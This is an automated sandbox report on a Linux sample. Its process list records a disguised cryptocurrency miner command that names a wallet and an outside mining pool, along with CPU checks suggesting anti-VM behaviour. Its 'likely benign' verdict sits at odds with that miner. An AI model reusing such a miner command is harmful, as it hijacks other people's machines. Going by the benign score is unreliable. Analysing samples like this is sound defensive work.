Malware Analysis Report

2024-10-24 21:46

Sample ID: 240521-d8m6ksgc52
Target: 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
SHA256: 77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087
Tags: antivm
Score: 4/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 4/10

SHA256: 77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087

Threat Level: Likely benign

The file 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-21 03:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:43

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]

Signatures

Checks CPU configuration

Tag: antivm

Description: File opened for reading
Indicator: /proc/cpuinfo
Process: /bin/grep
Target: N/A

Writes file to tmp directory

Description: File opened for modification
Indicator: /tmp/bash.pid
Process: /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
Target: N/A

Processes

/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118

[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]

/usr/bin/wc

[wc -l]

/usr/bin/sort

[sort -u]

/bin/grep

[grep ^core id /proc/cpuinfo]

/bin/uname

[uname -m]

/usr/bin/perl

[perl b.pl]

/tmp/h64

[./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p x:[email protected] -k -B -l Word.txt --donate-level=1]

Network

Country   Destination            Domain   Proto
N/A       224.0.0.251:5353       -        udp
GB        185.125.188.62:443     -        tcp
GB        185.125.188.61:443     -        tcp
US        151.101.193.91:443     -        tcp
US        151.101.193.91:443     -        tcp
GB        195.181.164.15:443     -        tcp

Files

/tmp/bash.pid

MD5 94f95cdbde2a1f83e642c708096500d0
SHA1 a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b
SHA256 aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107
SHA512 e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:43

Platform

debian9-armhf-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:40

Platform

debian9-mipsbe-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:41

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A